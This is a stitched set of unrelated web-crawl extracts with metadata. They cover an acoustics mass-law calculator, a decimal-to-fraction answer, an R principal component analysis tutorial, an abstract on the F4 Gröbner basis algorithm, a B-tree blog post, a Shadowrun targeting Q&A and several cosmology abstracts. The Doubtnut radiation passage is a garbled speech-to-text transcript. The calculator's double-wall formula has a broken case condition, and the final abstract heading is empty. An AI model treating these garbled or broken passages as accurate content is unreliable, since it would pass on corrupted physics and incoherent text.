$(u(v))'=v'u'(v)=(2x+1)cos(x^2+x)$ | 2019-02-16 13:31:28 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5783700942993164, "perplexity": 12091.693920168382}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247480472.38/warc/CC-MAIN-20190216125709-20190216151709-00576.warc.gz"} |
https://calculla.com/calculators/calculator/mass_law_for_double_wall | Mass law calculator for double layer
Calculator finds out sound reduction in decibels (dB) for double layer wall with given density, thickness and air gap width using so-called mass law equation.
# Beta version#
BETA TEST VERSION OF THIS ITEM
This online calculator is currently under heavy development. It may or it may NOT work correctly.
You CAN try to use it. You CAN even get the proper results.
However, please VERIFY all results on your own, as the level of completion of this item is NOT CONFIRMED.
Feel free to send any ideas and comments !
# Transmission loss at various frequencies#
Frequency [Hz] Transmission loss [dB] 31.25 44.54 62.5 50.56 125 56.58 250 62.6 500 68.62 1000 74.64 2000 80.66 4000 86.68 8000 92.7 16000 98.72
# Sound insulation#
• When a sound wave moves through the air meets a barrier in the form of a wall, part of the acoustic energy is reflected, part is absorbed inside the wall (converted to heat), and the another part is transmited out (on the other side of the wall). We can write it mathematically as follows:
$\alpha + \beta + \tau = 1$
where:
• $\alpha$ - absorption coefficient (determines the part of the energy that was absorbed inside the wall),
• $\beta$ - reflection coefficient (defines the part of the energy remaining in the first room),
• $\tau$ - transmission coefficient (defines the part of the energy that was emitted to the second room).
• The transmission coefficient can be used as a measure of the acoustic insulation, because it determines the sound intensity ratio on both sides of the wall:
$\tau = \frac{I_t}{I_0}$
where:
• $I_t$ - intensity of the wave on the other side of the wall (sound intensity level audible in the second room),
• $I_0$ - incident wave intensity (sound intensity level audible in the first room).
• In practice, the transmission factor is most often given in the logarithmic scale. In this way, we obtain a decrease in sound intensity given in decibels, so-called transmission loss:
$\Delta TL = -10 ~ log (\tau) = 10 ~ log \left(\frac{1}{\tau}\right)$
# Some facts#
• The acoustic insulation of a single wall is limited by its thickness and density of the material used. We can overcome these limits using two walls separated by air gap. The resulting system is called depending on the source:
• wall-air-wall,
• mass-air-mass,
• mass-spring-mass (more often found in theoretical papers where such a system is modeled by two masses connected with a spring).
• Sound reduction index for double wall can be estimated using formulas introduced by London in 1950, updated later by Sharp in 1973:
$R(f) = \begin{cases} 20 ~ log\left[f \cdot (h_1 ~ \rho_1 + h_2 ~ \rho_2) \right] - 47, & \text{when } f f_l \end{cases}$
where:
• $R$ - decrease of the sound intensity level of a partition consisting of two walls in decibels,
• $R_1, R_2$ - sound level decrease calculated for the first and second walls separately,
• $h_1, h_2$ - thickness of the first and second walls,
• $\rho_1, \rho_2$ - material density of which the first and second walls are made,
• $d$ - distance between walls (cavity width),
• $f$ - frequency of the acoustic wave,
• $f_0$ - resonant frequency $f_0 = \sqrt{\frac{\rho_0 \cdot c_0^2}{d} \cdot \frac{h_1 ~ \rho_1 + h_2 ~ \rho_2} {h_1 ~ \rho_1 ~ h_2 ~ \rho_2}}$,
• $f_l$ - limit frequency $f_l \approx \sqrt{\frac{55}{d}}$,
• $c_0$ - speed of sound in the air,
• $\rho_0$ - air density
If you're interested in calculators related to acoustics, check out our other calculators:
• Sound intensity level (dB) - if you want to learn what is decibel and how the sound intensity level is measured,
• Sound velocity in materials - if you want to learn how the type of substance affects the speed of acoustic wave propagation,
• Acoustic impedance of substances - if you want to learn what is acoustic impedance and how it depends on the type of substance,
• Sound wave reflection - if you want to find out how an acoustic wave behaves when it encounters an obstacle in the form of media boundary,
• Mass law: single wall - if you're interested in building acoustics and would like to estimate the acoustic insulation of a single wall,
• Mass law: double wall - if you're interested in building acoustics and would like to estimate the acoustic insulation of a double wall with an air gap between the walls,
• Sound absorption coefficients - if you're interested in acoustic adaptation of room and you would like to learn how different materials absorb the acoustic wave,
• Noise propagation - if you want to learn how sound intensity level changes with distance from the source,
• Sound insulation countours - if you want to learn more about acoustic insulation assessment standards used over the world,
• Sound reduction index (SRI) - if you're searching for acoustic insulation of popular building materials expressed in the coefficient Rw,
• Sound transmission class (STC) - if you're searching for acoustic insulation of popular building materials expressed by the index STC.
# Room within the room#
• A room whose all walls and ceiling are surrounded by an empty air gap (the room has no common walls with others except a common floor) is often called a room-within-the-room.
• The disadvantage of this solution is high cost and permanent modification of the building.
• For example, in order to isolate a medium-sized live room with a usable area of approx. 26 m2 we need an additional approx. 24 m2 of empty space for air-gap insulation (assuming a distance between the walls of 1 m). Additionally, it is necessary to raise the entire building or to give up part of the height of the separated room (to leave an empty space under the outer room ceiling).
• For this reason, classic room-within-the-room solutions are used only in specialized buildings, which of purpose is permanently related to the need of high acoustic insulation such as recording studios or sound laboratories.
# Links to external sites (leaving Calculla?)#
JavaScript failed !
So this is static version of this website.
This website works a lot better in JavaScript enabled browser. | 2022-08-14 09:04:23 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 21, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5607494115829468, "perplexity": 1048.7190918791628}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572021.17/warc/CC-MAIN-20220814083156-20220814113156-00446.warc.gz"} |
https://www.gradesaver.com/textbooks/math/algebra/algebra-1-common-core-15th-edition/chapter-1-foundations-for-algebra-1-2-order-of-operations-and-evaluating-expressions-practice-and-problem-solving-exercises-page-15/80 | ## Algebra 1: Common Core (15th Edition)
$\frac{17}{40}$
0.425 Given $\frac{425}{1000}$ Write it as fraction. $\frac{17}{40}$ Simplify the fraction. | 2018-10-23 23:15:03 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9088449478149414, "perplexity": 7046.173741116112}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-43/segments/1539583517495.99/warc/CC-MAIN-20181023220444-20181024001944-00354.warc.gz"} |
https://bookdown.org/content/1340/principal-component-analysis.html | ## 6.3 Principal component analysis
Let’s retain only two components or factors:
summary(full_factor(toothpaste, dimensions, nr_fact = 2)) # Ask for two factors by filling in the nr_fact argument.
## Factor analysis
## Data : toothpaste
## Variables : prevents_cavities, shiny_teeth, strengthens_gums, freshens_breath, decay_prevention_unimportant, attractive_teeth
## Factors : 2
## Method : PCA
## Rotation : varimax
## Observations: 60
##
## RC1 RC2
## prevents_cavities 0.96 -0.03
## shiny_teeth -0.05 0.85
## strengthens_gums 0.93 -0.15
## freshens_breath -0.09 0.85
## decay_prevention_unimportant -0.93 -0.08
## attractive_teeth 0.09 0.88
##
## Fit measures:
## RC1 RC2
## Eigenvalues 2.69 2.26
## Variance % 0.45 0.38
## Cumulative % 0.45 0.82
##
## Attribute communalities:
## prevents_cavities 92.59%
## shiny_teeth 72.27%
## strengthens_gums 89.36%
## freshens_breath 73.91%
## decay_prevention_unimportant 87.78%
## attractive_teeth 79.01%
##
## Factor scores (max 10 shown):
## RC1 RC2
## 1.15 -0.30
## -1.17 -0.34
## 1.29 -0.86
## 0.29 1.11
## -1.43 -1.49
## 0.97 -0.31
## 0.39 -0.94
## 1.33 -0.03
## -1.02 -0.64
## -1.31 1.56
Have a look at the table under the header Factor loadings. These loadings are the correlations between the original dimensions (prevents_cavities, shiny_teeth, etc.) and the two factors that are retained (RC1 and RC2). We see that prevents_cavities, strengthens_gums, and decay_prevention_unimportant score highly on the first factor, whereas shiny_teeth, strengthens_gums, and freshens_breath score highly on the second factor. We could therefore say that the first factor describes health-related concerns and that the second factor describes appearance-related concerns.
We also want to know how much each of the six dimensions are explained by the extracted factors. For this, we can look at the communality of the dimensions (header: Attribute communalities). The communality of a variable is the percentage of that variable’s variance that is explained by the factors. Its complement is called uniqueness (= 1-communality). Uniqueness could be pure measurement error, or it could represent something that is measured reliably by that particular variable, but not by any of the other variables. The greater the uniqueness, the more likely that it is more than just measurement error. A uniqueness of more than 0.6 is usually considered high. If the uniqueness is high, then the variable is not well explained by the factors. We see that for all dimensions, communality is high and therefore uniqueness is low, so all dimensions are captured well by the extracted factors.
We can also plot the loadings. For this, we’ll use two packages:
install.packages("FactoMiner")
install.packages("factoextra")
library(FactoMineR)
library(factoextra)
toothpaste %>% # take dataset
select(-consumer,-age,-gender) %>% # retain only the dimensions
as.data.frame() %>% # convert into a data.frame object, otherwise PCA won't accept it
PCA(ncp = 2, graph = FALSE) %>% # do a principal components analysis and retain 2 factors
fviz_pca_var(repel = TRUE) # take this analysis and turn it into a visualization
We see that attractive_teeth, shiny_teeth, freshens_breath have high scores on the second factor (the X-axis Dim2). prevents_cavities and strengthens_gums have high scores on the second factor (the Y-axis Dim2) and decay_prevention_unimportant has a low score on this factor (this variable measures how unimportant prevention of decay is). We can also add the observations (the different consumers) to this plot:
toothpaste %>% # take dataset
select(-consumer,-age,-gender) %>% # retain only the dimensions
as.data.frame() %>% # convert into a data.frame object, otherwise PCA won't accept it
PCA(ncp = 2, graph = FALSE) %>% # do a principal components analysis and retain 2 factors
fviz_pca_biplot(repel = TRUE) # take this analysis and turn it into a visualization
This is also called a biplot. | 2019-05-25 01:56:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5355165600776672, "perplexity": 7284.545114176232}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232257845.26/warc/CC-MAIN-20190525004721-20190525030721-00113.warc.gz"} |
http://eprint.iacr.org/2010/158/20100324:154206 | ## Cryptology ePrint Archive: Report 2010/158
A variant of the F4 algorithm
Antoine Joux and Vanessa Vitse
Abstract: Algebraic cryptanalysis usually requires to find solutions of several similar polynomial systems. A standard tool to solve this problem consists of computing the Gröbner bases of the corresponding ideals, and Faugère's F4 and F5 are two well-known algorithms for this task. In this paper, we present a new variant of the F4 algorithm which is well suited to algebraic attacks of cryptosystems since it is designed to compute Gröbner bases of a set of polynomial systems having the same shape. It is faster than F4 as it avoids all reductions to zero, but preserves its simplicity and its computation efficiency, thus competing with F5.
Category / Keywords: Gröbner basis, F4, F5, multivariate cryptography, algebraic cryptanalysis | 2016-07-01 16:29:15 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8175031542778015, "perplexity": 868.047542522002}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783403502.46/warc/CC-MAIN-20160624155003-00034-ip-10-164-35-72.ec2.internal.warc.gz"} |
http://ternarysearch.blogspot.com/2013/05/b-trees.html | ## Sunday, May 5, 2013
### B-trees
The B-tree is one of the fundamental data structures used by database indexes. It is essentially a generalization of the binary search tree where each node can contain more than two children. I never got around to actually learning how a B-tree is implemented and how all the operations work, so I figured I would take a blog post to lay it all out. The main tuning parameter of B-trees is the degree, which controls how many children each node has. If the degree is $2d$, then each internal node (except potentially the root) has between $d$ and $2d$ children, inclusive. An internal node with $k$ children has $k-1$ separator values which denote the ranges that the children cover, e.g. if the separator values are $\{2, 5,8\}$ then the children could cover the ranges $(-\infty, 2)$, $(2, 5)$, $(5, 8)$, and $(8, \infty)$, assuming we know nothing about how the parent has already been bounded. Leaves which are not also the root have the same requirement on the number of keys, i.e. between $d-1$ and $2d-1$. Additionally, all leaves are at the same depth in the tree. We'll see how these properties are maintained through all of the operations on the tree.
First, let's start with the easy operation, looking up a key in the B-tree. Similarly to a binary search tree, we start at the root and traverse downwards by picking the appropriate child. This is done by choosing the child whose range contains the key we are searching for; if $d$ is sufficiently large, we can do a binary search within the node to find the right child. Next, consider insertion. Again, we traverse down the tree by choosing the appropriate child until we reach a leaf. If the leaf is not full (it can contain a maximum of $2d-1$ keys like internal nodes), then we simply add the key to the leaf. If it is full, then we consider all $2d$ keys, split them into two groups of keys using one of the median keys $m$, and insert $m$ into the parent node. If the parent is not full, then we are done. Otherwise, we repeat the process; if the root is full and has a key inserted into it, we split those keys as before and create a new root that has two children. The latter is the only case in which the height of the tree increases, and since we create a new root, all leaves are still at the same depth.
Finally, we come to deletion, which always seems to be the hardest operation. We begin by finding the key in the tree. If the key is in an internal node, we can delete it in the same way that you would delete from a binary search tree. Consider the two children separated by that key; choose either the smallest key in the right child or the largest key in the left child as the new separator value and delete that key from the leaf. So now we have reduced deletion to just deleting from leaves. If the leaf has $d$ or more keys, we simply remove it and return. Otherwise, we need to consider rebalancing the tree to maintain the property that all nodes have between $d-1$ and $2d-1$ keys. To rebalance, look at the immediate left and right siblings of the node which has too few keys (if they exist). If one of them has $d$ or more keys, then move the closest key from the sibling to the current node and update both nodes and the parent's separator value (it is somewhat of a "rotation"). Otherwise, take one of the immediate siblings, which must have $d-1$ elements, combine it with the current node, and move the separator value from the parent to the new combined node. If the parent now has too few keys, we repeat the process. If we reach the root and it has only two children which are subsequently combined, the height of the tree decreases. Again, this leaves all of the leaves at the same depth.
So that is a basic implementation of a B-tree, and there are certainly many optimizations that can be made to reduce the number of times you have to retrieve nodes. But the last important discussion is why B-trees are better than binary search trees for databases. And the reason is because B-trees are designed to leverage the performance properties of spinning disks. Disks have very high seek latency due to the time it takes for the mechanical arm to move to the correct location, but they have relatively good throughput once the arm is in place (see here for more details). As such, disk-backed data structures benefit more from reading a block of data at once rather than a very small amount. In the case of B-trees, the size of the nodes are often chosen to be exactly the size of a disk block to maximize performance; as such, the data structure has much smaller depth than a binary search tree, resulting in many fewer disk seeks and significantly better performance. | 2018-11-14 03:23:23 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6188887357711792, "perplexity": 321.49657514851566}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-47/segments/1542039741578.24/warc/CC-MAIN-20181114020650-20181114042650-00134.warc.gz"} |
https://www.doubtnut.com/question-answer-physics/radiations-given-out-from-a-source-when-subjected-to-an-electric-field-in-a-direction-perpendicular--644314145 | Home
>
English
>
Class 10
>
Physics
>
Chapter
>
Self Assessment Paper -5
>
Radiations given out from a so...
Updated On: 27-06-2022
Get Answer to any question, just click a photo and upload the photo and get the answer completely free,
UPLOAD PHOTO AND GET THE ANSWER NOW!
Text Solution
Solution : gamma - Ray
Loading Books
Answer
Step by step solution by experts to help you in doubt clearance & scoring excellent marks in exams.
Transcript
hello friends for question radiation given out from a spot when subjected to an electric to in the direction perpendicular to the park as shown below in the diet the arrow to the part of medicine APC answer the following questions in term of a b and c name the radiation name the radiation which is acted by electronic pen that are coming out would be either alpha beta gamma particle you know that Alpha particles contains a charge of plus two beta particle contains a charge of minus and gamma particles contains a charge of zero has come aapatkal doesn't contain any charge and it got an affected and effected by electronic
electronic that is apply thank you
Click here to get PDF DOWNLOAD for all questions and answers of this chapter - ICSE Class 10 SELF ASSESSMENT PAPER -5
Click here to get PDF DOWNLOAD for all questions and answers of this Book - ICSE Class 10 PHYSICS
Comments
Add a public comment... | 2022-08-15 16:28:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2802797853946686, "perplexity": 1931.9177110453033}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572192.79/warc/CC-MAIN-20220815145459-20220815175459-00465.warc.gz"} |
https://rpg.stackexchange.com/questions/134427/are-there-shooting-modifiers-for-large-targets | # Are there shooting modifiers for Large targets?
A player made a Troll, Giant subtype, so he is 3.5 meters (11 feet, 3 inches) in height and I am wondering: are rules where it says he is any easier to hit than, say, a 1.2m dwarf?
If not it seems a bit unfair to me toward smaller targets. Yet, I just started to GM Shadowrun, so I could be overlooking something.
Assuming you're interested in 5th edition:
Run & Gun contains an optional rule (RG2, p. 108), but it's based on $$\CON + STR\$$, so dwarfs are usually easier to hit than humans. The following modifiers apply to the attack roll based on the sum:
$$\begin{array}{|r|r|}\hline CON+STR&modifier\\\hline 2\text{ to }4& -1\\\hline 5\text{ to }10& 0\\\hline 11\text{ to }15& +1\\\hline \geq16& +2\\\hline \end{array}$$
There are smaller (-2 and -3) and larger (+3) modifiers, but those don't apply to metahuman sized targets.
As for fairness:
Trolls have a maximum INT that is reduced by 1. Also the cost of building a troll is extraordiarily high. Giants als have a reduced REA max.
But why is using the same modifier unfair? You knew the benefits and drawbacks of building a dwarf/troll when creating the char and size doesn't seem to be considered a advantage or drawback when determining the costs of a metatype (except for higher lifestyle cost).
• The giant is an awakened so Con and Str are not his stats. He's a flabby giant. Penalties for having such a creature aside, I thought would be unfair since he can literally become antitank cover for the rest of his team when he dies and falls down. He is enormous, hence wondering were there any modifiers. Thank you for your answer. – Story Killinger Oct 27 '18 at 8:17
• @StoryKillinger uhm... Giant is a troll metatype, they are generally around the 3.5 meters mark with a 11+ on Con+Str. to frame it simple: Giants are Metahumans, not creatures – Trish Oct 27 '18 at 14:19 | 2021-06-21 04:32:09 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 2, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3756294548511505, "perplexity": 2738.9286000340358}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488262046.80/warc/CC-MAIN-20210621025359-20210621055359-00339.warc.gz"} |
https://www.cosmostat.org/tag/euclid | ## Hybrid Pℓ(k): general, unified, non-linear matter power spectrum in redshift space
### Hybrid Pℓ(k): general, unified, non-linear matter power spectrum in redshift space
Authors: Journal: Journal of Cosmology and Astroparticle Physics, Issue 09, article id. 001 (2020) Year: 09/2020 Download: Inspire| Arxiv | DOI
## Abstract
Constraints on gravity and cosmology will greatly benefit from performing joint clustering and weak lensing analyses on large-scale structure data sets. Utilising non-linear information coming from small physical scales can greatly enhance these constraints. At the heart of these analyses is the matter power spectrum. Here we employ a simple method, dubbed "Hybrid Pl(k)", based on the Gaussian Streaming Model (GSM), to calculate the quasi non-linear redshift space matter power spectrum multipoles. This employs a fully non-linear and theoretically general prescription for the matter power spectrum. We test this approach against comoving Lagrangian acceleration simulation measurements performed in GR, DGP and f(R) gravity and find that our method performs comparably or better to the dark matter TNS redshift space power spectrum model {for dark matter. When comparing the redshift space multipoles for halos, we find that the Gaussian approximation of the GSM with a linear bias and a free stochastic term, N, is competitive to the TNS model.} Our approach offers many avenues for improvement in accuracy as well as further unification under the halo model.
## Abstract
In metric theories of gravity with photon number conservation, the luminosity and angular diameter distances are related via the Etherington relation, also known as the distance-duality relation (DDR). A violation of this relation would rule out the standard cosmological paradigm and point at the presence of new physics. We quantify the ability of Euclid, in combination with contemporary surveys, to improve the current constraints on deviations from the DDR in the redshift range 0<z<1.6. We start by an analysis of the latest available data, improving previously reported constraints by a factor of 2.5. We then present a detailed analysis of simulated Euclid and external data products, using both standard parametric methods (relying on phenomenological descriptions of possible DDR violations) and a machine learning reconstruction using Genetic Algorithms. We find that for parametric methods Euclid can (in combination with external probes) improve current constraints by approximately a factor of six, while for non-parametric methods Euclid can improve current constraints by a factor of three. Our results highlight the importance of surveys like Euclid in accurately testing the pillars of the current cosmological paradigm and constraining physics beyond the standard cosmological model.
## Precision calculations of the cosmic shear power spectrum projection
Authors: M. Kilbinger, C. Heymans, M. Asgari et al. Journal: MNRAS Year: 2017 Download: ADS | arXiv
## Abstract
We compute the spherical-sky weak-lensing power spectrum of the shear and convergence. We discuss various approximations, such as flat-sky, and first- and second- order Limber equations for the projection. We find that the impact of adopting these approximations are negligible when constraining cosmological parameters from current weak lensing surveys. This is demonstrated using data from the Canada-France-Hawaii Lensing Survey (CFHTLenS). We find that the reported tension with Planck Cosmic Microwave Background (CMB) temperature anisotropy results cannot be alleviated, in contrast to the recent claim made by Kitching et al. (2016, version 1). For future large-scale surveys with unprecedented precision, we show that the spherical second-order Limber approximation will provide sufficient accuracy. In this case, the cosmic-shear power spectrum is shown to be in agreement with the full projection at the sub-percent level for l > 3, with the corresponding errors an order of magnitude below cosmic variance for all l. When computing the two-point shear correlation function, we show that the flat-sky fast Hankel transformation results in errors below two percent compared to the full spherical transformation. In the spirit of reproducible research, our numerical implementation of all approximations and the full projection are publicly available within the package nicaea at http://www.cosmostat.org/software/nicaea.
## Summary
We discuss various methods to calculate projections for weak gravitational lensing: Since lenses galaxies pick up matter inhomogeneities of the cosmic web along the line of sight while photons from the galaxies propagate through the Universe to the observer, these inhomogeneities have to be projected to a 2D observable, the cumulative shear or convergence. The full projection involves three-dimensional integrals over highly oscillating Bessel functions, and can be time-consuming to compute numerically to high accuracy. Most previous work have therefore used approximations such as the Limber approximation, that reduce the integrals to 1D, and thereby neglecting modes along the line of sight.
The authors show that these projections are more than adequate for present surveys. Sub-percent accuracy is reached for l>20, for example as shown by the pink curve, which is the ratio of the case 'ExtL1Hyb' to the full projection. The abbreviation means 'extended', corresponding to the improved approximation introduced by LoVerde & Afshordi (2008), first-order Limber, and hybrid, since this is a hybrid between flat-sky and spherical coordinates. This case has been used in most of the recent publications (e.g. for KiDS), whereas the cast 'L1Fl' (first-order Limber flat-sky) was popular for most publications since 2014.
These approximations are sufficient for the small areas of current observations coming from CFHTLenS, KiDS, and DES, and well below cosmic variance of even future surveys (the figure shows Euclid - 15,000 deg2 and Kids -1,500 deg2).
The paper then discusses the second-order Limber approximation, introduced in a general framework by LoVerde & Afshordi (2008), and applied to weak lensing in the current paper. The best 2nd-order case 'ExtL2Sph' reaches sub-percent accuracy down to l=3, sufficient for all future surveys.
The paper also computes the shear correlation function in real space, and shows that those approximations have a very minor influence.
We then go on to re-compute the cosmological constraints obtained in Kilbinger et al. (2013), and find virtually no change when choosing different approximations. Only the depreciated case 'ExtL1Fl' makes a noticeable difference, which is however still well within the statistical error bars. This case shows a particular slow convergence to the full projection.
Similar results have been derived in two other recent publications, Kitching et al. (2017), and Lemos, Challinor & Efstathiou (2017).
Note however that Kitching et al. (2017) conclude that errors from projection approximations of the types we discussed here (Limber, flat sky) could make up to 11% of the error budget of future surveys. This is however assuming the worst-case scenario including the deprecated cast 'ExtL1Fl', and we do not share their conclusion, but think that for example the projection 'ExtL2Sph' is sufficient for future surveys such as LSST and Euclid.
## Abstract
We present new constraints on the relationship between galaxies and their host dark matter halos, measured from the location of the peak of the stellar-to-halo mass ratio (SHMR), up to the most massive galaxy clusters at redshift
$z\sim0.8$
and over a volume of nearly 0.1~Gpc
$^3$
. We use a unique combination of deep observations in the CFHTLenS/VIPERS field from the near-UV to the near-IR, supplemented by
$\sim60\,000$
secure spectroscopic redshifts, analysing galaxy clustering, galaxy-galaxy lensing and the stellar mass function. We interpret our measurements within the halo occupation distribution (HOD) framework, separating the contributions from central and satellite galaxies. We find that the SHMR for the central galaxies peaks at
$M_{\rm h, peak} = 1.9^{+0.2}_{-0.1}\times10^{12} M_{\odot}$
with an amplitude of
$0.025$
, which decreases to
$\sim0.001$
for massive halos (
$M_{\rm h} > 10^{14} M_{\odot}$
). Compared to central galaxies only, the total SHMR (including satellites) is boosted by a factor 10 in the high-mass regime (cluster-size halos), a result consistent with cluster analyses from the literature based on fully independent methods. After properly accounting for differences in modelling, we have compared our results with a large number of results from the literature up to
$z=1$
: we find good general agreement, independently of the method used, within the typical stellar-mass systematic errors at low to intermediate mass (
${M}_{\star} < 10^{11} M_{\odot}$
) and the statistical errors above. We have also compared our SHMR results to semi-analytic simulations and found that the SHMR is tilted compared to our measurements in such a way that they over- (under-) predict star formation efficiency in central (satellite) galaxies.
## Abstract
